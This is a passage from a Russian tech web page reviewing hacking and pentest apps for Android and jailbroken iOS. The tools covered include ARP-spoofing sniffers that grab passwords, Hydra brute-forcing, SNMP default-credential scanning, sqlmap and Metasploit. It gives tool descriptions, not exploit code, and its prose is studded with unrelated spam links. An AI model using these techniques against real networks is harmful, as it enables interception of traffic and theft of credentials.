шестнадцатеричный редактор, то для Android он тоже есть. С помощью HexEditor ты сможешь редактировать любые файлы, в том числе и системные, если повысишь программе права до суперпользователя. Отличная замена стандартному редактору текстов, позволяющая с легкостью найти нужный фрагмент текста и изменить его. <h2>Удаленный доступ</h2> ConnectBot Получив доступ к удаленному хосту, нужно иметь возможность им воспользоваться. А для этого нужны клиенты. Начнем с SSH, где стандартом де-факто уже является ConnectBot. Помимо <a href="/novinka---luchshii-multimediinyi-resiver-v-svoem-cenovom-diapazone-u2c-denys-h-265/">удобного интерфейса</a>, предоставляет возможность организации защищенных туннелей через SSH-подключения. PocketCloud Remote RDP/VNC <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/Android_PocketCloud-Remote.jpeg' align="center" height="512" width="307" loading=lazy> Полезная программа, позволяющая подключаться к удаленному рабочему столу через сервисы RDP или VNC. Очень радует, что это два клиента в одном, нет необходимости использовать разные тулзы для RDP и VNC. SNMP MIB Browser <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_SNMP_MIB_Browser.jpg' align="center" height="480" width="320" loading=lazy> Специально написанный для Android браузер MIB, с помощью которого можно управлять сетевыми устройствами по протоколу SNMP. Сможет пригодиться для развития вектора атаки на различные маршрутизаторы, ведь стандартные community string (проще говоря, пароль для доступа) для управления через SNMP еще никто не отменял. <h2>iOS</h2> Не менее популярна среди разработчиков security-утилит платформа iOS. Но если в случае с Android права root’а были нужны только для некоторых приложений, то на устройствах от Apple джейлбрейк обязателен почти всегда. К счастью, даже для <a href="/gs-8302-proshivka-poslednyaya-proshivka-resivera-trikolor-tv-dlya/">последней прошивки</a> iДевайсов (5.1.1) уже есть тулза для джейлбрейка. Вместе с полным доступом ты еще получаешь и альтернативный менеджер приложений Cydia, в котором уже собраны многие утилиты. <h2>Работа с системой</h2> MobileTerminal <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_MobileTerminal-187x280.jpg' height="280" width="187" loading=lazy> Первое, с чего хочется начать, - это установка терминала. По понятным причинам в стандартной поставке мобильной ОС его нет, но он нам понадобится, чтобы запускать консольные утилиты, о которых мы далее будем говорить. Лучшей реализацией эмулятора терминала является MobileTerminal - он поддерживает сразу несколько терминалов, жесты для управления (например, для передачи Control-C) и вообще впечатляет своей продуманностью. iSSH <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/iOS_iSSH.png' align="center" height="920" width="640" loading=lazy> Еще один, более сложный вариант получить доступ к консоли устройства - установить на нем OpenSSH (это делается через Cydia) и локально подключаться к нему через SSH-клиент. Если использовать правильный клиент вроде iSSH, в котором изумительно реализовано управление с <a href="/mozhno-li-otshlifovat-ekran-telefona-kak-udalit-carapiny-s-ekrana/">сенсорного экрана</a>, то этот способ даже более удобен, чем через MobileTerminal. <h2>Перехват данных</h2> Pirni & Pirni Pro <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/iOS_Pirni-187x280.png' height="280" width="187" loading=lazy> Теперь, когда доступ к консоли есть, можно попробовать утилиты. Начнем с Pirni, вошедшей в историю как полноценный сниффер для iOS. К сожалению, конструктивно ограниченный <a href="/esli-zabyl-parol-ot-vai-fai-doma-kak-uznat-svoi-parol-ot-wi-fi-ili-chto/">модуль Wi-Fi</a>, встроенный в устройство, невозможно перевести в promiscious-режим, необходимый для нормального перехвата данных. Так что для перехвата данных используется классический ARP-спуфинг, с помощью которого весь трафик пропускается через само устройство. <a href="/1s-predpriyatie-8-biblioteka-standartnyh-podsistem-vnedrenie-1s-biblioteka/">Стандартная версия</a> утилиты запускается из консоли, где помимо параметров MITM-атаки указывается имя PCAP-файла, в который логируется весь трафик. У утилиты есть более продвинутая версия - Pirni Pro, которая может похвастаться <a href="/okonnoe-prilozhenie-i-graficheskii-interfeis-polzovatelya-osnovnye/">графическим интерфейсом</a>. Причем она умеет на лету парсить HTTP-трафик и даже автоматически вытаскивать оттуда интересные данные (к примеру, логины-пароли), используя для этого регулярные выражения, которые задаются в настройках. Intercepter-NG (console edition) <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Intercepter-NG-249x280.jpg' height="280" width="249" loading=lazy> Небезызвестный сниффер Intercepter-NG, о котором мы неоднократно писали, с недавнего времени имеет консольную версию. Как говорит автор, большая часть кода написана на чистом ANSI C, который ведет себя одинаково практически в любой среде, поэтому консольная версия с самого начала заработала как на десктопных Windows, Linux и BSD, так и на <a href="/1s-mobilnaya-platforma-kak-ustanovit-8-3-8-itak-pochemu-mobilnye/">мобильных платформах</a>, в том числе iOS и Android. В консольной версии уже реализован граббинг паролей, передаваемых по самым разным протоколам, перехват сообщений мессенджеров (ICQ/Jabber и многих других), а также воскрешение файлов из трафика (HTTP/FTP/IMAP/POP3/SMTP/SMB). При этом доступны функции сканирования сети и качественный ARP Poison. Для корректной работы необходимо предварительно установить через Cydia пакет libpcap (не забудь в настройках включить девелоперские пакеты). Вся инструкция по запуску сводится к установке правильных прав: chmod +x intercepter_ios. Далее, если запустить сниффер без параметров, появится понятный интерактивный интерфейс Itercepter, позволяющий запустить любые атаки. Ettercap-NG <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Ettercap-NG1-187x280.png' height="280" width="187" loading=lazy> Трудно поверить, но этот сложнейший инструмент для реализации MITM-атак все-таки портировали под iOS. После колоссальной работы получилось сделать полноценный мобильный порт. Чтобы избавить себя от танцев с бубном вокруг зависимостей во время самостоятельной компиляции, лучше установить уже собранный пакет, используя Cydia, предварительно добавив в качестве источника данных theworm.altervista.org/cydia (репозиторий TWRepo). В комплекте идет и утилита etterlog, которая помогает извлечь из собранного дампа трафика различного рода <a href="/otchet-o-spravochno-bibliograficheskom-i-informacionnom/">полезную информацию</a> (к примеру, аккаунты доступа к FTP). <h2>Анализ беспроводных сетей</h2> WiFi Analyzer <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_WiFI-Analyzer-187x280.jpg' height="280" width="187" loading=lazy> В старых версиях iOS умельцы запускали aircrack и могли ломать WEP-ключ, но мы проверили: на новых устройствах программа не работает. Поэтому для исследования Wi-Fi нам придется довольствоваться только Wi-Fi-сканерами. WiFi Analyzer анализирует и отображает информацию обо всех доступных 802.11 сетях вокруг, включая информацию о SSID, каналах, вендорах, MAC-адресах и типах шифрования. Утилита строит наглядные графики в реальном времени по присутствующим в эфире данным. С такой программой легко найти физическое местоположение точки, если ты вдруг его забыл, и, например, посмотреть WPS PIN, который может быть полезен для подключения. <h2>Сетевые сканеры</h2> Scany Какой программой пользуется любой пентестер в любой точке планеты независимо от целей и задач? Сетевым сканером. И в случае с iOS это, скорее всего, будет мощнейший тулкит Scany. Благодаря набору встроенных утилит можно быстро получить подробную картину о <a href="/chto-delat-esli-net-vai-fai-modulya-ne-rabotaet-wi-fi-na-noutbuke-naibolee/">сетевых устройств</a>ах и, к примеру, открытых портах. Помимо этого пакет включает в себя утилиты тестирования сети, такие как ping, traceroute, nslookup. Fing Впрочем, многие отдают предпочтение Fing’у. Сканер имеет достаточно простой и ограниченный функционал, но его вполне хватит для первого знакомства с сетью, скажем, кафетерия:). В результатах отображается информация о доступных сервисах на удаленных машинах, MAC-адреса и имена хостов, подключенных к сканируемой сети. Nikto Казалось бы, про Nikto все забыли, но почему? Ведь этот веб-сканер уязвимостей, написанный на скрипт-языке (а именно на Perl), ты легко сможешь установить через Cydia. А это значит, что ты без особого труда сможешь запустить его на своем джейлбрейкнутом устройстве из терминала. Nikto с радостью предоставит тебе <a href="/opticheskie-diski-ih-svoistva-i-obem-opticheskii-disk-chto/">дополнительную информацию</a> по испытуемому веб-ресурсу. К тому же ты своими руками можешь добавить в его базу данных знаний собственные сигнатуры для поиска. sqlmap Этот мощный инструмент для автоматической эксплуатации SQL-уязвимостей написан на Python, а значит, установив интерпретатор, им без проблем можно пользоваться прямо с мобильного устройства. <h2>Удаленное управление</h2> SNMP Scan <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_SNMP-Scan.jpg' align="center" height="480" width="334" loading=lazy> Многие сетевые устройства (в том числе дорогие роутеры) управляются по протоколу SNMP. Эта утилита позволяет просканировать подсети на наличие доступных сервисов SNMP с заранее известными значением community string (проще говоря, стандартными паролями). Заметим, что поиск сервисов SNMP со стандартными community string (public/private) в попытке получить доступ к управлению устройствами - неотъемлемая часть любого теста на проникновение наряду с идентификацией самого периметра и выявлением сервисов. iTap mobile RDP / iTap mobile VNC <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_iTap_Mobile_RDP.jpg' align="center" height="480" width="320" loading=lazy> Две утилиты от одного производителя предназначены для подключения к удаленному рабочему столу по протоколам RDP и VNC. Подобных утилит в <a href="/trenirovochnye-plany-runkeeper-app-store-runkeeper-uchet-sportivnyh-uspehov/">App Store</a> много, но именно эти особенно удобны в использовании. <h2>Восстановление паролей</h2> Hydra <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Hydra-187x280.jpg' height="280" width="187" loading=lazy> Легендарная программа, помогающая «вспомнить» пароль миллионам хакеров по всему миру была портирована под iOS. Теперь прямо с iPhone’а возможен перебор паролей к таким сервисам, как HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 и многим другим. Правда, для более эффективной атаки лучше запастись хорошими словарями для брутфорса. Pass Mule <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_PassMule.jpg' align="center" height="480" width="320" loading=lazy> Всем не понаслышке известна такая уязвимость, как использование <a href="/kakoi-standartnyi-parol-ot-vaifaya-netis-podklyuchenie-i-nastroika-routera-netis/">стандартных паролей</a>. Pass Mule представляет собой своего рода справочник, в котором собраны всевозможные стандартные логины и пароли для сетевых устройств. Они удобно разложены по названиям вендоров, продуктам и моделям, так что найти нужный не составит труда. Программа скорее предназначена для экономии времени на поиске мануала к роутеру, стандартный логин и пароль для которого необходимо узнать. <h2>Эксплуатация уязвимостей</h2> Metasploit <br><img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Metasploit.png' align="center" width="100%" loading=lazy> Сложно представить себе более хакерскую утилиту, нежели Metasploit, - и именно она завершает наш сегодняшний обзор. Metasploit - это пакет разнообразных инструментов, основная задача которого заключается в эксплуатации уязвимостей в <a href="/programmnoe-obespechenie-primery-razrabotka-programmnogo-obespecheniya/">программном обеспечении</a>. Представь: около 1000 надежных, проверенных и необходимых в повседневной жизни пентестера эксплойтов - прямо на смартфоне! С помощью такого инструмента реально можно обосноваться в любой сети. Metasploit позволяет не только эксплуатировать бреши в серверных приложениях - доступны также инструменты для атак на клиентские приложения (например, через модуль Browser Autopwn, когда в трафик клиентов вставляется боевая нагрузка). Тут надо сказать, что <a href="/fotostrana-moya-stranica-voiti-mobilnaya-versiya-golosovanie/">мобильной версии</a> тулкита не существует, однако на Apple-устройство можно установить стандартный пакет, воспользовавшись . <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy>");</script> <p style="text-align: center;"></p> <p> <div style="text-align: center; margin: 3px 0;"> </div> <div style="text-align: center; margin: 1px 0 5px;"> </div> </p><span class="adplacer_pro_adblock_end_post_content" style="display: none;width: 0;height: 0;"></span> </article> <div class="post-meta"> <div class="post-share"> <div class="post-share__title">Поделиться с друзьями:</div> <script type="text/javascript" src="//yastatic.net/share2/share.js" charset="utf-8" async="async"></script><div class="ya-share2" data-services="vkontakte,facebook,odnoklassniki,gplus,twitter" data-counter=""></div> </div> </div> <div class="title">Похожие публикации</div> <div class="yarpp-related"> <ul class="related-items"> <style> </style> <style> #perelink-horizontal{ vertical-align: top; margin: 0 -5px; text-align: left; } #perelink-horizontal .perelink-horizontal-item { vertical-align: top; display: inline-block; width: 230px; margin: 0 5px 10px; } #perelink-horizontal .perelink-horizontal-item a span { display: block; margin-top: 10px; } #perelink-horizontal img{ width:230px; height:150px; margin-bottom:10px; } </style> <div id="perelink-horizontal"> <div class="perelink-horizontal-item"> <a href="/peredacha-dannyh-na-ps-vita-ps-vita-v-kachestve-kontrollera-dlya-ps4/"> <img src="/uploads/f087805a7a879cd65277e2340749d5e2.jpg" height="150" width="230" loading=lazy> <span>PS Vita в качестве контроллера для PS4</span> </a> </div> <div class="perelink-horizontal-item"> <a href="/udobnyi-failoobmennik-bez-registracii-luchshii-sposob/"> <img src="/uploads/0c17c50c3ae577104e2b76c32a940995.jpg" height="150" width="230" loading=lazy> <span>Лучший способ отправить большой файл по интернету</span> </a> </div> <div class="perelink-horizontal-item"> <a href="/kriptopro-4-0-9708-klyuch-licenzii-kak-vvesti-seriinyi-nomer/"> <img src="/uploads/1285ab0d53e66c5a60dc06f55c2c818c.jpg" height="150" width="230" loading=lazy> <span>Криптопро 4.0 9708 ключ лицензии. Как ввести серийный номер КриптоПро — Контур.Экстерн. Если сертификат со встроенной лицензией</span> </a> </div> </div> </ul> </div> <div class="yarpp-related"> <ul class="related-items"> <li><img src="/uploads/02d3d5f98819fa5f68b65979a739b4d7.jpg" / loading=lazy> <a href="/vashe-soedinenie-zashchishcheno-kak-izbavitsya-vashe-podklyuchenie-ne/" target="_blank" rel="nofollow noopener noreferrer">Ваше подключение не защищено в Chrome — что делать?</a></li> <li><img src="/uploads/401e2fdc81aa2a911aff9aad8fe86486.jpg" / loading=lazy> <a href="/ne-otobrazhayutsya-obshchie-papki-setevye-kompyutery-fleshki-diski-na-vkladke/" target="_blank" rel="nofollow noopener noreferrer">Не отображаются общие папки, сетевые компьютеры, флешки, диски на вкладке «Сеть» проводника Windows Windows 10 перестал видеть компьютеры в сети</a></li> <li><img src="/uploads/c1fab3dba64e89c90651e7eacbfc90ef.jpg" / loading=lazy> <a href="/andy-recepty-kulinar-andrei-rudkov-recepty-master-klassy-ph-to-est-vs-vot-tak/" target="_blank" rel="nofollow noopener noreferrer">Кулинар Андрей Рудьков: рецепты, мастер-классы</a></li> </ul> </div> </main> <aside class="sidebar"> <div class="search-form ya-site-form ya-site-form_inited_no" onclick="return { 'bg': 'transparent', 'publicname': '\u041f\u043e\u0438\u0441\u043a \u043f\u043e justrust.ru', 'target': '_self', 'language': 'ru', 'suggest': true, 'tld': 'ru', 'site_suggest': true, 'action': '/search', 'webopt': false, 'fontsize': 12, 'arrow': false, 'fg': '#000000', 'searchid': '2265323', 'logo': 'rb', 'websearch': false, 'type': 2} "> <form action="/search" method="get" target="_self"> <input type="hidden" name="searchid" value="2265323"> <input type="hidden" name="l10n" value="ru"> <input type="hidden" name="reqenc" value=""> <input type="text" name="text" placeholder="Поиск по сайту:" class="search-form__field" value=""> <input type="submit" value="" class="search-form__button"> </form> </div> <div class="social-icon"> <a href="https://vk.com/share.php?url=https://justrust.ru/prostoi-sposob-ukrast-cookie-sposoby-krazhi-kuki-failov-skachat/" target="_blank" class="vk">ВКонтакте</a> <a href="https://www.twitter.com/share?url=https://justrust.ru/prostoi-sposob-ukrast-cookie-sposoby-krazhi-kuki-failov-skachat/" target="_blank" class="tw">Twitter</a> <a href="" target="_blank" class="gp">Google+</a> </div> <nav class="sidebar-menu section"><ul> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="/category/programmy/">Программы</a> </li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="/category/windows/">Windows</a> </li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="/category/brauzery/">Браузеры</a> </li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="/category/socialnye-seti/">Социальные сети</a> </li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="/category/servisy/">Сервисы</a> </li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="/category/kompyuter/">Компьютер</a> </li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="/category/oshibki/">Ошибки</a> </li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="/category/vredonosnoe-po/">Вредоносное ПО</a> </li> </ul></nav> <div class="section section-question"> <div class="title"><a href="/">Новые статьи</a></div> <ul class="section-question__posts"> <li> <a href="/zvukovye-kody-bios-zvukovye-signaly-pri-vklyuchenii-pk-signaly/">Звуковые сигналы при включении пк Сигналы спикера биос</a> </li> <li> <a href="/odnoklassniki-tam-gde-odnoklassniki-vhod-voiti-na-svoyu/">Одноклассники вход – войти на свою страницу</a> </li> <li> <a href="/kak-obnovit-programmnoe-obespechenie-oborudovaniya/">Как обновить П Триколор ТВ: Пошаговая инструкция Как обновить спутниковый приемник триколор</a> </li> <li> <a href="/kak-otkryt-fail-iso-vse-vozmozhnye-sposoby-kak-otkryt-iso-fail-kakoi-programmoi/">Как открыть ISO файл Какой программой распаковать iso</a> </li> <li> <a href="/voprosy-po-servisu-mobilnyi-bilet-usluga-bilain/">Услуга Билайн «Мобильный билет</a> </li> <li> <a href="/obshchaya-ocenka-podbora-bitreita-dlya-hd-televideniya-versiya-dlya-zhurnala/">Что такое битрейт и как его правильно рассчитать Как проверить свой битрейт</a> </li> </ul> </div> <div class="section-posts-box section"> <div class="title">Популярные статьи</div> <div class="section-video section-posts"> <div class="section-posts__item section-posts__item_popular"> <img src="/uploads/5a7401005b58eaf05a37e5bd46c6b908.jpg" width="199" height="150" alt="Функции Transact-SQL Как задать дату в sql запросе" / loading=lazy> <a href="/sql-funkcii-daty-funkcii-transact-sql-kak-zadat-datu-v-sql-zaprose/" class="section-posts__item-title">Функции Transact-SQL Как задать дату в sql запросе</a> </div> <div class="section-posts__item section-posts__item_popular"> <img src="/uploads/0b80703b759166c66140ec61415c97ba.jpg" width="199" height="150" alt="Как настроить мобильный интернет на смартфоне с двумя SIM-картами" / loading=lazy> <a href="/rabotaet-2-simka-kak-nastroit-mobilnyi-internet-na-smartfone-s-dvumya/" class="section-posts__item-title">Как настроить мобильный интернет на смартфоне с двумя SIM-картами</a> </div> <div class="section-posts__item section-posts__item_popular"> <img src="/uploads/9fb14b59adf0ea3f62630f44667d940b.jpg" width="199" height="150" alt="Приложение - AliExpress на русском Бесплатное приложение - AliExpress Shopping v" / loading=lazy> <a href="/gde-skachat-prilozhenie-aliekspress-prilozhenie---aliexpress-na-russkom/" class="section-posts__item-title">Приложение - AliExpress на русском Бесплатное приложение - AliExpress Shopping v</a> </div> </div> </div> <div class="section-posts-box section"> <div class="title"><a href="/">Выбор редакции</a></div> <div class="section-video section-posts"> <div class="section-posts__item"> <img src="/uploads/cb7d21a030d323dde15296337ea7131f.jpg" width="199" height="150" alt="Что можно сделать из старой магнитолы?" / loading=lazy> <a href="/kak-sdelat-iz-magnitoly-domashnii-kinoteatr-chto-mozhno-sdelat-iz/" class="section-posts__item-title section-title_video">Что можно сделать из старой магнитолы?</a> </div> <div class="section-posts__item"> <img src="/uploads/ec2e3e3cb8216d44614a19fa1668d5ce.jpg" width="199" height="150" alt="Мосэнергосбыт Московской области" / loading=lazy> <a href="/mosenergosbyt-dlya-yuridicheskih-lic-lichnyi-kabinet-mosenergosbyt/" class="section-posts__item-title section-title_video">Мосэнергосбыт Московской области</a> </div> <div class="section-posts__item"> <img src="/uploads/090264521934d2c7e3eb34baeafb4249.jpg" width="199" height="150" alt="Подключение сканера штрихкода с помощью атол программы" / loading=lazy> <a href="/podklyuchenie-skanera-shtrih-koda-k-1s-podklyuchenie-skanera/" class="section-posts__item-title section-title_video">Подключение сканера штрихкода с помощью атол программы</a> </div> </div> </div> </aside> </div> <footer class="footer"> <div class="wrap"> <div class="logo logo_footer" style="background:none;"> <div class="logo__copy">Все права защищены, 2024</div> </div> <nav class="footer-navid"> <ul> <li class="menu-item type-post_type object-page "><a href="">О сайте</a></li> <li class="menu-item type-post_type object-page "><a href="/sitemap.xml">Карта сайта</a></li> </ul> </nav> <div class="social-icon"> <a href="https://vk.com/share.php?url=https://justrust.ru/prostoi-sposob-ukrast-cookie-sposoby-krazhi-kuki-failov-skachat/" target="_blank" class="vk">ВКонтакте</a> <a href="https://www.twitter.com/share?url=https://justrust.ru/prostoi-sposob-ukrast-cookie-sposoby-krazhi-kuki-failov-skachat/" target="_blank" class="tw">Twitter</a> <a href="" target="_blank" class="gp">Google+</a> </div> </div> </footer> <script>var adsplacerProAdblockMessage = { "message":"<div class=\"adb-def\">\r\n <div>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0435 AdBlock?<\/div>\r\n <div>\u0420\u0435\u043a\u043b\u0430\u043c\u0430 \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442 \u0440\u0430\u0437\u0432\u0438\u0432\u0430\u0442\u044c \u0435\u0433\u043e<\/div>\r\n \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0432\u043d\u0435\u0441\u0438\u0442\u0435 \u043c\u043e\u0439 \u0441\u0430\u0439\u0442 \u0432 \u0432\u0430\u0439\u0442\u043b\u0438\u0441\u0442 \u0432\u0430\u0448\u0435\u0433\u043e AdBlock \u043f\u043b\u0430\u0433\u0438\u043d\u0430\r\n<\/div>"} </script><script>var adsplacerProAdblockFirstOnly = 0</script><script>var adsplacerProVersion = "2.5.7"</script><script>if(!AdsplacerProReadCookie('adsplacerProReferrer')){ document.cookie = "adsplacerProReferrer=" + document.referrer + "; path=/; expires=" + (new Date(new Date().getTime() + 60 * 60 * 24 * 1000)).toUTCString(); } </script><script>var adsplacerProPostId = "1848"</script><script>var CookieDate = new Date;CookieDate.setDate(391);document.cookie = 'adsplacerProDontShowAdsIds=' + JSON.stringify(adsplacerProFirstTime) + '; expires=' + CookieDate.toGMTString( ) + '; path=/';</script><script>var adsplacerProAdblockExtendMessages = []</script><script type='text/javascript' src='https://justrust.ru/wp-content/plugins/adsplacer_pro/assets/js/jquery.adsplacer.adblock.js?ver=2.5.7'></script> <script type='text/javascript' src='/wp-includes/js/comment-reply.min.js?ver=4.9.1'></script> <script type='text/javascript' src='/assets/scripts1.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var tocplus = { "visibility_show":"\u041f\u043e\u043a\u0430\u0437\u0430\u0442\u044c","visibility_hide":"\u0421\u043a\u0440\u044b\u0442\u044c","width":"Auto"} ; /* ]]> */ </script> <script type='text/javascript' src='https://justrust.ru/wp-content/plugins/table-of-contents-plus/front.min.js?ver=1509'></script> <script type='text/javascript' src='https://justrust.ru/wp-content/plugins/wp-postratings/js/postratings-js.js?ver=1.84'></script> <script type='text/javascript'> var q2w3_sidebar_options = new Array(); q2w3_sidebar_options[0] = { "sidebar" : "sidebar-2", "margin_top" : 10, "margin_bottom" : 150, "stop_id" : "", "screen_max_width" : 0, "screen_max_height" : 0, "width_inherit" : false, "refresh_interval" : 1500, "window_load_hook" : false, "disable_mo_api" : false, "widgets" : ['custom_html-2'] } ; </script> <script type='text/javascript' src='https://justrust.ru/wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js?ver=5.0.4'></script> </div> </body> </html>